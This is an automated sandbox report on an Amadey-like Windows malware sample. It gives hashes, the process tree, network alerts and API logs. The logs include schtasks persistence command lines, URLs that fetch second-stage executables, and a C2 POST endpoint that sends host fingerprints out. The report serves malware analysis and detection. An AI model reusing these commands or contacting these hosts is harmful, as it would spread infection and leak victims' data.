Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 6, 2023, 9:43 a.m.	Nov. 6, 2023, 9:45 a.m.

Size	5.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`3e478dcc2a01b6115012627f06045690`
SHA256	`06de55c057b8778e494903b3da7588e4c9d1cec766f969000d7986ed31f213cb`
CRC32	`FED1A118`
ssdeep	`98304:y6fw/xdWJY6iIF7yKZm4deNzzt2ydOt7FECnxInG99CW:Tw/xzwGGdIDYpFwnCL`
Yara	UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description)

amday.exe "C:\Users\test22\AppData\Local\Temp\amday.exe"
2552
- Utsysc.exe "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe"
  2720
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
    2784
  - clips.exe "C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe"
    2908
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\s28s.0.bat" "
      2968
      - timeout.exe timeout 3
        3028
      - YKM.exe "C:\ProgramData\SMUCCI\YKM.exe"
        2076
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
        152
  - mnr.exe "C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe"
    744
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
tinsignsnmore.com	A 45.79.14.106	45.79.14.106
cynorix.com	A 64.34.75.145	64.34.75.145

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.172.128.100	Active	Moloch
45.79.14.106	Active	Moloch
64.34.75.145	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 45.79.14.106:80 -> 192.168.56.101:49166	2014819	ET INFO Packed Executable Download	Misc activity
TCP 45.79.14.106:80 -> 192.168.56.101:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.79.14.106:80 -> 192.168.56.101:49166	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49170 -> 64.34.75.145:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 64.34.75.145:80 -> 192.168.56.101:49170	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 64.34.75.145:80 -> 192.168.56.101:49170	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 185.172.128.100:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49169 -> 185.172.128.100:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 6, 2023, 9:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 6, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 6, 2023, 9:43 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 6, 2023, 9:43 a.m.			0	0
IsDebuggerPresent Nov. 6, 2023, 9:43 a.m.			0	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 6, 2023, 9:43 a.m.	buffer: SUCCESS: The scheduled task "Utsysc.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 6, 2023, 9:43 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 6, 2023, 9:43 a.m.	buffer: Could Not Find C:\Users\test22\AppData\Local\Temp\s28s.2 console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 6, 2023, 9:43 a.m.	buffer: SUCCESS: The scheduled task "YKM" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 6, 2023, 9:43 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.zip#**.

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	TIS
resource name	None

One or more processes crashed (6 events)

Time & API	Arguments	Status
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: clips+0x368b75 @ 0x15c8b75 clips+0x36bc62 @ 0x15cbc62 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 3144952 registers.edi: 19542016 registers.eax: 3144952 registers.ebp: 3145032 registers.edx: 2130566132 registers.ebx: 20334216 registers.esi: 1995994155 registers.ecx: 2668888064	1
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: exception.instruction_r: ed e9 1f 92 02 00 c3 e9 d2 83 f9 ff f5 8b 62 91 exception.symbol: clips+0x39747f exception.instruction: in eax, dx exception.module: clips.exe exception.exception_code: 0xc0000096 exception.offset: 3765375 exception.address: 0x15f747f registers.esp: 3145072 registers.edi: 4861434 registers.eax: 1750617430 registers.ebp: 19542016 registers.edx: 22614 registers.ebx: 2147483650 registers.esi: 19916755 registers.ecx: 20	1
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: exception.instruction_r: ed e9 1f 09 07 00 1a 37 88 23 ff ff 1e ce cd 35 exception.symbol: clips+0x32daf0 exception.instruction: in eax, dx exception.module: clips.exe exception.exception_code: 0xc0000096 exception.offset: 3332848 exception.address: 0x158daf0 registers.esp: 3145072 registers.edi: 4861434 registers.eax: 1447909480 registers.ebp: 19542016 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 19916755 registers.ecx: 10	1
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: ykm+0x368b75 @ 0xd48b75 ykm+0x36bc62 @ 0xd4bc62 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 2226576 registers.edi: 10629120 registers.eax: 2226576 registers.ebp: 2226656 registers.edx: 2130566132 registers.ebx: 11421320 registers.esi: 1995994155 registers.ecx: 2978152448	1
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: exception.instruction_r: ed e9 1f 92 02 00 c3 e9 d2 83 f9 ff f5 8b 62 91 exception.symbol: ykm+0x39747f exception.instruction: in eax, dx exception.module: YKM.exe exception.exception_code: 0xc0000096 exception.offset: 3765375 exception.address: 0xd7747f registers.esp: 2226696 registers.edi: 3288568 registers.eax: 1750617430 registers.ebp: 10629120 registers.edx: 22614 registers.ebx: 2147483650 registers.esi: 11003859 registers.ecx: 20	1
__exception__ Nov. 6, 2023, 9:43 a.m.	stacktrace: exception.instruction_r: ed e9 1f 09 07 00 1a 37 88 23 ff ff 1e ce cd 35 exception.symbol: ykm+0x32daf0 exception.instruction: in eax, dx exception.module: YKM.exe exception.exception_code: 0xc0000096 exception.offset: 3332848 exception.address: 0xd0daf0 registers.esp: 2226696 registers.edi: 3288568 registers.eax: 1447909480 registers.ebp: 10629120 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 11003859 registers.ecx: 10	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.172.128.100/u6vhSc3PPq/index.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://tinsignsnmore.com/clips.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://cynorix.com/mnr.exe

Performs some HTTP requests (3 events)

request	POST http://185.172.128.100/u6vhSc3PPq/index.php
request	GET http://tinsignsnmore.com/clips.exe
request	GET http://cynorix.com/mnr.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://185.172.128.100/u6vhSc3PPq/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 156 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2552 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:44 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000046c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0129a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0128a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0128a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 69632 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0128a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 2555904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef423b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000024e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3ba4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9441a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9442c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:44 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:44 a.m.	process_identifier: 744 region_size: 1880064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94601000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe944d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9442d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94841000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9441b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Nov. 6, 2023, 9:45 a.m.	process_identifier: 744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9484b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

YKM.exe tried to sleep 197 seconds, actually delayed analysis time by 197 seconds

Foreign language identified in PE resource (1 event)

name

RT_VERSION

language

LANG_KOREAN

filetype

data

sublanguage

SUBLANG_KOREAN

offset

0x0083fe60

size

0x00000300

Creates executable files on the filesystem (4 events)

file	C:\Users\test22\AppData\Local\Temp\s28s.0.bat
file	C:\ProgramData\SMUCCI\YKM.exe
file	C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe

Creates a suspicious process (4 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
cmdline	schtasks.exe /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
file	C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe
file	C:\Users\test22\AppData\Local\Temp\s28s.0.bat

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe
file	C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Nov. 6, 2023, 9:43 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe	1	1
ShellExecuteExW Nov. 6, 2023, 9:43 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Nov. 6, 2023, 9:43 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000001001\clips.exe	1	1
ShellExecuteExW Nov. 6, 2023, 9:43 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000004001\mnr.exe	1	1
ShellExecuteExW Nov. 6, 2023, 9:43 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\s28s.0.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\s28s.0.bat	1	1
ShellExecuteExW Nov. 6, 2023, 9:43 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /create /sc MINUTE /mo 1 /RL HIGHEST /tn "YKM" /tr C:\ProgramData\SMUCCI\YKM.exe /f filepath: schtasks.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 6, 2023, 9:43 a.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x024b0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process utsysc.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
